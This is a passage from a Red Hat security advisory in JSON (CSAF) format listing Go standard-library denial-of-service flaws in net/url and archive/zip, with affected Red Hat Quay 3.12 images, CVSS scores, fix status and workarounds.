"summary": "https://groups.google.com/g/golang-announce/c/Vd2tYVM8eUc",
"url": "https://groups.google.com/g/golang-announce/c/Vd2tYVM8eUc"
},
{
"category": "external",
"summary": "https://pkg.go.dev/vuln/GO-2026-4341",
"url": "https://pkg.go.dev/vuln/GO-2026-4341"
}
],
"release_date": "2026-01-28T19:30:31.215000+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2026-03-18T16:21:15+00:00",
"details": "Before applying this update, make sure all previously released errata relevant\nto your system have been applied.\n\nFor details on how to apply this update, refer to:\n\nhttps://access.redhat.com/articles/11258",
"product_ids": [
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-rhel8@sha256:2f62df99c2b7697461a2865380344c90a6fb8aec7b279f8f2f6e0684b662d19f_amd64",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-rhel8@sha256:4076a739c16c0567def8339bff5e8adca2f995217ae55428061cd0136a7e7a21_arm64",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-rhel8@sha256:56bcc55b01c76a1eb7ad8b265cf9dfdd488fc62bc353e3822864a0f6c4f98ffb_ppc64le",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-rhel8@sha256:e39ee513b081c979409b52c41db9222496868b3910c01b5c04de6f3206f467b5_s390x"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2026:4942"
},
{
"category": "workaround",
"details": "Red Hat has investigated whether a possible mitigation exists for this issue, and has not been able to identify a practical example. Please update the affected package as soon as possible.",
"product_ids": [
"Red Hat Quay 3.12:registry.redhat.io/quay/clair-rhel8@sha256:44efb07888bff09040aa413babedb3eed6ae9f329cb923ae9e09f2c65c507dd3_s390x",
"Red Hat Quay 3.12:registry.redhat.io/quay/clair-rhel8@sha256:6421325d2c7f726c34e365442ba15e8dce873aa4b3087239c0d6514feb702d6d_arm64",
"Red Hat Quay 3.12:registry.redhat.io/quay/clair-rhel8@sha256:9ca58008c4b6d439afa2d9286252c85c1845ca4764e9c5e914ffbbc12684178e_amd64",
"Red Hat Quay 3.12:registry.redhat.io/quay/clair-rhel8@sha256:d547771f59990e5f90668bdb967120d92c6b12e6b6666f935510ae839a5b8f46_ppc64le",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:5c95eca6b2fb921c444c04c03cff58a301ce8d127b43369e4791b3295c06f95c_amd64",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:26718ccb95dc9c16e9a68affd07c8f1ad9c4e5c86164827278aa165f7e047d2c_s390x",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:60b48ecb4c6d6769ad65b841142affc252abd5bb484532f8063097f13ba311db_ppc64le",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:80315fc3e515b6824fea23d86995354821089da0433696024a091e79e8526dad_amd64",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:f15f0ecb4db302df6d1cfbd7982b92e4911b774ed718c4ae6c6bf454154bcb1d_arm64",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:c3fcc8881b3cc3f44cd0f50825366b1e2462386ade01c6d7f50957720a2cb0ee_amd64",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-builder-rhel8@sha256:15a526a64adaaa0d711e1f6f91d92e7a31385ea5596bd80cd61d01b247899309_arm64",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-builder-rhel8@sha256:1dd39e160ca0759d55e636d7a849fb3c89dbf5d52484e3059e3c8a4ef251b4ce_amd64",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-builder-rhel8@sha256:4c1bce7e8d7de7fd8cfd98de842a6efd75c3c8f1add02646b6bc0b427a1d55f7_s390x",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-builder-rhel8@sha256:821a1a8274bed06ef5cf595656d919a2f0171fc2eaad04897b526159752d3066_ppc64le",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:04536d34e96ea1a8a5e3f54d55f1483bd017cdae867790e10ae18f6e4443d282_amd64",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:041f90dc8ecb773ba6c09d0a5f0b3660c5c4e81f1641bd823b37c7e33d966bca_arm64",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:66a357f4f825a657b8f0548901aef392421726e8bf2085806d15bbb9a6eb70bd_s390x",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:6c90db8ea68ed0afd44aed2f773a8aea115c028fe6635ea87020d3e3fcb4fb90_ppc64le",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:a5c4bfea66cf0109f309bf70391748febdbb01c576ab5ec6a77be0d7729de13f_amd64",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-operator-bundle@sha256:f4777e6f609dc915c82a0b69a07bf7bbefb8762ed0012b5e45a3a5de858592b9_amd64",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-operator-rhel8@sha256:1f87190bc1a9a0d5854572b6d39a00069b95c79cfe7c63a4562aa7fcbcee4c83_s390x",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-operator-rhel8@sha256:448968df737e1fe9efbe549ce6cded18b2a6c544b96aa4550f15f7d803d4a2af_amd64",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-operator-rhel8@sha256:48ca0b3afbfdc52d0407f2e3d62addffc65ac1f71abac7ebb643a52138753a93_ppc64le",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-operator-rhel8@sha256:dd1db128bff6a9784c185e3f3ce5304a089489cb52b23212a8457f275d779ec1_arm64",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-rhel8@sha256:2f62df99c2b7697461a2865380344c90a6fb8aec7b279f8f2f6e0684b662d19f_amd64",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-rhel8@sha256:4076a739c16c0567def8339bff5e8adca2f995217ae55428061cd0136a7e7a21_arm64",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-rhel8@sha256:56bcc55b01c76a1eb7ad8b265cf9dfdd488fc62bc353e3822864a0f6c4f98ffb_ppc64le",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-rhel8@sha256:e39ee513b081c979409b52c41db9222496868b3910c01b5c04de6f3206f467b5_s390x"
]
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"Red Hat Quay 3.12:registry.redhat.io/quay/clair-rhel8@sha256:44efb07888bff09040aa413babedb3eed6ae9f329cb923ae9e09f2c65c507dd3_s390x",
"Red Hat Quay 3.12:registry.redhat.io/quay/clair-rhel8@sha256:6421325d2c7f726c34e365442ba15e8dce873aa4b3087239c0d6514feb702d6d_arm64",
"Red Hat Quay 3.12:registry.redhat.io/quay/clair-rhel8@sha256:9ca58008c4b6d439afa2d9286252c85c1845ca4764e9c5e914ffbbc12684178e_amd64",
"Red Hat Quay 3.12:registry.redhat.io/quay/clair-rhel8@sha256:d547771f59990e5f90668bdb967120d92c6b12e6b6666f935510ae839a5b8f46_ppc64le",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:5c95eca6b2fb921c444c04c03cff58a301ce8d127b43369e4791b3295c06f95c_amd64",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:26718ccb95dc9c16e9a68affd07c8f1ad9c4e5c86164827278aa165f7e047d2c_s390x",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:60b48ecb4c6d6769ad65b841142affc252abd5bb484532f8063097f13ba311db_ppc64le",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:80315fc3e515b6824fea23d86995354821089da0433696024a091e79e8526dad_amd64",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:f15f0ecb4db302df6d1cfbd7982b92e4911b774ed718c4ae6c6bf454154bcb1d_arm64",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:c3fcc8881b3cc3f44cd0f50825366b1e2462386ade01c6d7f50957720a2cb0ee_amd64",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-builder-rhel8@sha256:15a526a64adaaa0d711e1f6f91d92e7a31385ea5596bd80cd61d01b247899309_arm64",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-builder-rhel8@sha256:1dd39e160ca0759d55e636d7a849fb3c89dbf5d52484e3059e3c8a4ef251b4ce_amd64",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-builder-rhel8@sha256:4c1bce7e8d7de7fd8cfd98de842a6efd75c3c8f1add02646b6bc0b427a1d55f7_s390x",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-builder-rhel8@sha256:821a1a8274bed06ef5cf595656d919a2f0171fc2eaad04897b526159752d3066_ppc64le",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:04536d34e96ea1a8a5e3f54d55f1483bd017cdae867790e10ae18f6e4443d282_amd64",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:041f90dc8ecb773ba6c09d0a5f0b3660c5c4e81f1641bd823b37c7e33d966bca_arm64",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:66a357f4f825a657b8f0548901aef392421726e8bf2085806d15bbb9a6eb70bd_s390x",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:6c90db8ea68ed0afd44aed2f773a8aea115c028fe6635ea87020d3e3fcb4fb90_ppc64le",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:a5c4bfea66cf0109f309bf70391748febdbb01c576ab5ec6a77be0d7729de13f_amd64",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-operator-bundle@sha256:f4777e6f609dc915c82a0b69a07bf7bbefb8762ed0012b5e45a3a5de858592b9_amd64",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-operator-rhel8@sha256:1f87190bc1a9a0d5854572b6d39a00069b95c79cfe7c63a4562aa7fcbcee4c83_s390x",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-operator-rhel8@sha256:448968df737e1fe9efbe549ce6cded18b2a6c544b96aa4550f15f7d803d4a2af_amd64",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-operator-rhel8@sha256:48ca0b3afbfdc52d0407f2e3d62addffc65ac1f71abac7ebb643a52138753a93_ppc64le",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-operator-rhel8@sha256:dd1db128bff6a9784c185e3f3ce5304a089489cb52b23212a8457f275d779ec1_arm64",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-rhel8@sha256:2f62df99c2b7697461a2865380344c90a6fb8aec7b279f8f2f6e0684b662d19f_amd64",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-rhel8@sha256:4076a739c16c0567def8339bff5e8adca2f995217ae55428061cd0136a7e7a21_arm64",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-rhel8@sha256:56bcc55b01c76a1eb7ad8b265cf9dfdd488fc62bc353e3822864a0f6c4f98ffb_ppc64le",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-rhel8@sha256:e39ee513b081c979409b52c41db9222496868b3910c01b5c04de6f3206f467b5_s390x"
]
}
],
"threats": [
{
"category": "impact",
"details": "Important"
}
],
"title": "golang: net/url: Memory exhaustion in query parameter parsing in net/url"
},
{
"cve": "CVE-2025-61728",
"cwe": {
"id": "CWE-770",
"name": "Allocation of Resources Without Limits or Throttling"
},
"discovery_date": "2026-01-28T20:01:39.965024+00:00",
"flags": [
{
"label": "vulnerable_code_not_present",
"product_ids": [
"Red Hat Quay 3.12:registry.redhat.io/quay/clair-rhel8@sha256:44efb07888bff09040aa413babedb3eed6ae9f329cb923ae9e09f2c65c507dd3_s390x",
"Red Hat Quay 3.12:registry.redhat.io/quay/clair-rhel8@sha256:6421325d2c7f726c34e365442ba15e8dce873aa4b3087239c0d6514feb702d6d_arm64",
"Red Hat Quay 3.12:registry.redhat.io/quay/clair-rhel8@sha256:9ca58008c4b6d439afa2d9286252c85c1845ca4764e9c5e914ffbbc12684178e_amd64",
"Red Hat Quay 3.12:registry.redhat.io/quay/clair-rhel8@sha256:d547771f59990e5f90668bdb967120d92c6b12e6b6666f935510ae839a5b8f46_ppc64le",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:5c95eca6b2fb921c444c04c03cff58a301ce8d127b43369e4791b3295c06f95c_amd64",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:26718ccb95dc9c16e9a68affd07c8f1ad9c4e5c86164827278aa165f7e047d2c_s390x",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:60b48ecb4c6d6769ad65b841142affc252abd5bb484532f8063097f13ba311db_ppc64le",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:80315fc3e515b6824fea23d86995354821089da0433696024a091e79e8526dad_amd64",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:f15f0ecb4db302df6d1cfbd7982b92e4911b774ed718c4ae6c6bf454154bcb1d_arm64",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:c3fcc8881b3cc3f44cd0f50825366b1e2462386ade01c6d7f50957720a2cb0ee_amd64",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-builder-rhel8@sha256:15a526a64adaaa0d711e1f6f91d92e7a31385ea5596bd80cd61d01b247899309_arm64",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-builder-rhel8@sha256:1dd39e160ca0759d55e636d7a849fb3c89dbf5d52484e3059e3c8a4ef251b4ce_amd64",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-builder-rhel8@sha256:4c1bce7e8d7de7fd8cfd98de842a6efd75c3c8f1add02646b6bc0b427a1d55f7_s390x",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-builder-rhel8@sha256:821a1a8274bed06ef5cf595656d919a2f0171fc2eaad04897b526159752d3066_ppc64le",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:04536d34e96ea1a8a5e3f54d55f1483bd017cdae867790e10ae18f6e4443d282_amd64",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:041f90dc8ecb773ba6c09d0a5f0b3660c5c4e81f1641bd823b37c7e33d966bca_arm64",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:66a357f4f825a657b8f0548901aef392421726e8bf2085806d15bbb9a6eb70bd_s390x",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:6c90db8ea68ed0afd44aed2f773a8aea115c028fe6635ea87020d3e3fcb4fb90_ppc64le",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:a5c4bfea66cf0109f309bf70391748febdbb01c576ab5ec6a77be0d7729de13f_amd64",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-operator-bundle@sha256:f4777e6f609dc915c82a0b69a07bf7bbefb8762ed0012b5e45a3a5de858592b9_amd64",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-operator-rhel8@sha256:1f87190bc1a9a0d5854572b6d39a00069b95c79cfe7c63a4562aa7fcbcee4c83_s390x",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-operator-rhel8@sha256:448968df737e1fe9efbe549ce6cded18b2a6c544b96aa4550f15f7d803d4a2af_amd64",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-operator-rhel8@sha256:48ca0b3afbfdc52d0407f2e3d62addffc65ac1f71abac7ebb643a52138753a93_ppc64le",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-operator-rhel8@sha256:dd1db128bff6a9784c185e3f3ce5304a089489cb52b23212a8457f275d779ec1_arm64"
]
}
],
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2434431"
}
],
"notes": [
{
"category": "description",
"text": "A flaw was found in the archive/zip package in the Go standard library. A super-linear file name indexing algorithm is used in the first time a file in an archive is opened. A crafted zip archive containing a specific arrangement of file names can cause an excessive CPU and memory consumption. A Go application processing a malicious archive can become unresponsive or crash, resulting in a denial of service.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "golang: archive/zip: Excessive CPU consumption when building archive index in archive/zip",
"title": "Vulnerability summary"
},
{
"category": "other",
"text": "To exploit this flaw, an attacker needs to be able to process a malicious zip archive with an application using the archive/zip package. Additionally, this vulnerability can cause a Go application to consume an excessive amount of CPU and memory, eventually resulting in a denial of service with no other security impact. Due to these reasons, this flaw has been rated with a moderate severity.",
"title": "Statement"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-rhel8@sha256:2f62df99c2b7697461a2865380344c90a6fb8aec7b279f8f2f6e0684b662d19f_amd64",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-rhel8@sha256:4076a739c16c0567def8339bff5e8adca2f995217ae55428061cd0136a7e7a21_arm64",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-rhel8@sha256:56bcc55b01c76a1eb7ad8b265cf9dfdd488fc62bc353e3822864a0f6c4f98ffb_ppc64le",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-rhel8@sha256:e39ee513b081c979409b52c41db9222496868b3910c01b5c04de6f3206f467b5_s390x"
],
"known_not_affected": [
"Red Hat Quay 3.12:registry.redhat.io/quay/clair-rhel8@sha256:44efb07888bff09040aa413babedb3eed6ae9f329cb923ae9e09f2c65c507dd3_s390x",
"Red Hat Quay 3.12:registry.redhat.io/quay/clair-rhel8@sha256:6421325d2c7f726c34e365442ba15e8dce873aa4b3087239c0d6514feb702d6d_arm64",
"Red Hat Quay 3.12:registry.redhat.io/quay/clair-rhel8@sha256:9ca58008c4b6d439afa2d9286252c85c1845ca4764e9c5e914ffbbc12684178e_amd64",
"Red Hat Quay 3.12:registry.redhat.io/quay/clair-rhel8@sha256:d547771f59990e5f90668bdb967120d92c6b12e6b6666f935510ae839a5b8f46_ppc64le",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:5c95eca6b2fb921c444c04c03cff58a301ce8d127b43369e4791b3295c06f95c_amd64",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:26718ccb95dc9c16e9a68affd07c8f1ad9c4e5c86164827278aa165f7e047d2c_s390x",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:60b48ecb4c6d6769ad65b841142affc252abd5bb484532f8063097f13ba311db_ppc64le",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:80315fc3e515b6824fea23d86995354821089da0433696024a091e79e8526dad_amd64",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:f15f0ecb4db302df6d1cfbd7982b92e4911b774ed718c4ae6c6bf454154bcb1d_arm64",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:c3fcc8881b3cc3f44cd0f50825366b1e2462386ade01c6d7f50957720a2cb0ee_amd64",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-builder-rhel8@sha256:15a526a64adaaa0d711e1f6f91d92e7a31385ea5596bd80cd61d01b247899309_arm64",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-builder-rhel8@sha256:1dd39e160ca0759d55e636d7a849fb3c89dbf5d52484e3059e3c8a4ef251b4ce_amd64",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-builder-rhel8@sha256:4c1bce7e8d7de7fd8cfd98de842a6efd75c3c8f1add02646b6bc0b427a1d55f7_s390x",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-builder-rhel8@sha256:821a1a8274bed06ef5cf595656d919a2f0171fc2eaad04897b526159752d3066_ppc64le",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:04536d34e96ea1a8a5e3f54d55f1483bd017cdae867790e10ae18f6e4443d282_amd64",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:041f90dc8ecb773ba6c09d0a5f0b3660c5c4e81f1641bd823b37c7e33d966bca_arm64",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:66a357f4f825a657b8f0548901aef392421726e8bf2085806d15bbb9a6eb70bd_s390x",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:6c90db8ea68ed0afd44aed2f773a8aea115c028fe6635ea87020d3e3fcb4fb90_ppc64le",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:a5c4bfea66cf0109f309bf70391748febdbb01c576ab5ec6a77be0d7729de13f_amd64",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-operator-bundle@sha256:f4777e6f609dc915c82a0b69a07bf7bbefb8762ed0012b5e45a3a5de858592b9_amd64",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-operator-rhel8@sha256:1f87190bc1a9a0d5854572b6d39a00069b95c79cfe7c63a4562aa7fcbcee4c83_s390x",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-operator-rhel8@sha256:448968df737e1fe9efbe549ce6cded18b2a6c544b96aa4550f15f7d803d4a2af_amd64",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-operator-rhel8@sha256:48ca0b3afbfdc52d0407f2e3d62addffc65ac1f71abac7ebb643a52138753a93_ppc64le",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-operator-rhel8@sha256:dd1db128bff6a9784c185e3f3ce5304a089489cb52b23212a8457f275d779ec1_arm64"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2025-61728"
},
{
"category": "external",
"summary": "RHBZ#2434431",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2434431"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2025-61728",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-61728"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2025-61728",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2025-61728"
},
{
"category": "external",
"summary": "https://go.dev/cl/736713",
"url": "https://go.dev/cl/736713"
},
{
"category": "external",
"summary": "https://go.dev/issue/77102",
"url": "https://go.dev/issue/77102"
},
{
"category": "external",
"summary": "https://groups.google.com/g/golang-announce/c/Vd2tYVM8eUc",
"url": "https://groups.google.com/g/golang-announce/c/Vd2tYVM8eUc"
},
{
"category": "external",
"summary": "https://pkg.go.dev/vuln/GO-2026-4342",
"url": "https://pkg.go.dev/vuln/GO-2026-4342"
}
],
"release_date": "2026-01-28T19:30:31.354000+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2026-03-18T16:21:15+00:00",
"details": "Before applying this update, make sure all previously released errata relevant\nto your system have been applied.\n\nFor details on how to apply this update, refer to:\n\nhttps://access.redhat.com/articles/11258",
"product_ids": [
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-rhel8@sha256:2f62df99c2b7697461a2865380344c90a6fb8aec7b279f8f2f6e0684b662d19f_amd64",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-rhel8@sha256:4076a739c16c0567def8339bff5e8adca2f995217ae55428061cd0136a7e7a21_arm64",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-rhel8@sha256:56bcc55b01c76a1eb7ad8b265cf9dfdd488fc62bc353e3822864a0f6c4f98ffb_ppc64le",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-rhel8@sha256:e39ee513b081c979409b52c41db9222496868b3910c01b5c04de6f3206f467b5_s390x"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2026:4942"
},
{
"category": "workaround",
"details": "To mitigate this vulnerability, implement a timeout in your archive/zip processing logic to abort the operation if it exceeds a few seconds, preventing the application from consuming an excessive amount of resources.",
"product_ids": [
"Red Hat Quay 3.12:registry.redhat.io/quay/clair-rhel8@sha256:44efb07888bff09040aa413babedb3eed6ae9f329cb923ae9e09f2c65c507dd3_s390x",
"Red Hat Quay 3.12:registry.redhat.io/quay/clair-rhel8@sha256:6421325d2c7f726c34e365442ba15e8dce873aa4b3087239c0d6514feb702d6d_arm64",
"Red Hat Quay 3.12:registry.redhat.io/quay/clair-rhel8@sha256:9ca58008c4b6d439afa2d9286252c85c1845ca4764e9c5e914ffbbc12684178e_amd64",
"Red Hat Quay 3.12:registry.redhat.io/quay/clair-rhel8@sha256:d547771f59990e5f90668bdb967120d92c6b12e6b6666f935510ae839a5b8f46_ppc64le",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:5c95eca6b2fb921c444c04c03cff58a301ce8d127b43369e4791b3295c06f95c_amd64",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:26718ccb95dc9c16e9a68affd07c8f1ad9c4e5c86164827278aa165f7e047d2c_s390x",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:60b48ecb4c6d6769ad65b841142affc252abd5bb484532f8063097f13ba311db_ppc64le",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:80315fc3e515b6824fea23d86995354821089da0433696024a091e79e8526dad_amd64",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:f15f0ecb4db302df6d1cfbd7982b92e4911b774ed718c4ae6c6bf454154bcb1d_arm64",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:c3fcc8881b3cc3f44cd0f50825366b1e2462386ade01c6d7f50957720a2cb0ee_amd64",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-builder-rhel8@sha256:15a526a64adaaa0d711e1f6f91d92e7a31385ea5596bd80cd61d01b247899309_arm64",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-builder-rhel8@sha256:1dd39e160ca0759d55e636d7a849fb3c89dbf5d52484e3059e3c8a4ef251b4ce_amd64",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-builder-rhel8@sha256:4c1bce7e8d7de7fd8cfd98de842a6efd75c3c8f1add02646b6bc0b427a1d55f7_s390x",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-builder-rhel8@sha256:821a1a8274bed06ef5cf595656d919a2f0171fc2eaad04897b526159752d3066_ppc64le",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:04536d34e96ea1a8a5e3f54d55f1483bd017cdae867790e10ae18f6e4443d282_amd64",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:041f90dc8ecb773ba6c09d0a5f0b3660c5c4e81f1641bd823b37c7e33d966bca_arm64",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:66a357f4f825a657b8f0548901aef392421726e8bf2085806d15bbb9a6eb70bd_s390x",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:6c90db8ea68ed0afd44aed2f773a8aea115c028fe6635ea87020d3e3fcb4fb90_ppc64le",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:a5c4bfea66cf0109f309bf70391748febdbb01c576ab5ec6a77be0d7729de13f_amd64",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-operator-bundle@sha256:f4777e6f609dc915c82a0b69a07bf7bbefb8762ed0012b5e45a3a5de858592b9_amd64",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-operator-rhel8@sha256:1f87190bc1a9a0d5854572b6d39a00069b95c79cfe7c63a4562aa7fcbcee4c83_s390x",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-operator-rhel8@sha256:448968df737e1fe9efbe549ce6cded18b2a6c544b96aa4550f15f7d803d4a2af_amd64",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-operator-rhel8@sha256:48ca0b3afbfdc52d0407f2e3d62addffc65ac1f71abac7ebb643a52138753a93_ppc64le",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-operator-rhel8@sha256:dd1db128bff6a9784c185e3f3ce5304a089489cb52b23212a8457f275d779ec1_arm64",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-rhel8@sha256:2f62df99c2b7697461a2865380344c90a6fb8aec7b279f8f2f6e0684b662d19f_amd64",
